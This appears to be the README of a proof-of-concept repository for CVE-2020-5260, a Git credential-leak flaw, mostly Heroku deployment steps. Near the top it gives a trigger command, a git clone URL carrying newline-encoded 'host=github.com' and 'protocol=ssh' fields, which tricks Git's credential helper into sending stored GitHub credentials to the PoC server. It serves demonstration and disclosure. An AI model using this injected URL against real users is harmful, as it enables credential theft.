cve-2020-5260

A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku

CREDIT INFORMATION

Felix Wilhelm of Google Project Zero https://bugs.chromium.org/p/project-zero/issues/detail?id=2021

Trigger the vuln

git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'

Get PoC onto Heroku

Click this button to automagically deploy to Heroku...

Or follow the steps below...

Yes, I understand the irony of having to run Git clone commands to setup this PoC....

Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli

If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.

$ heroku login

Clone the repository

Use Git to clone cve-2020-5260's source code to your local machine.

$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260

Deploy your changes

Make some changes to the code you just cloned and deploy them to Heroku using Git.

$ git add .
$ git commit -am "make it better"
$ git push heroku master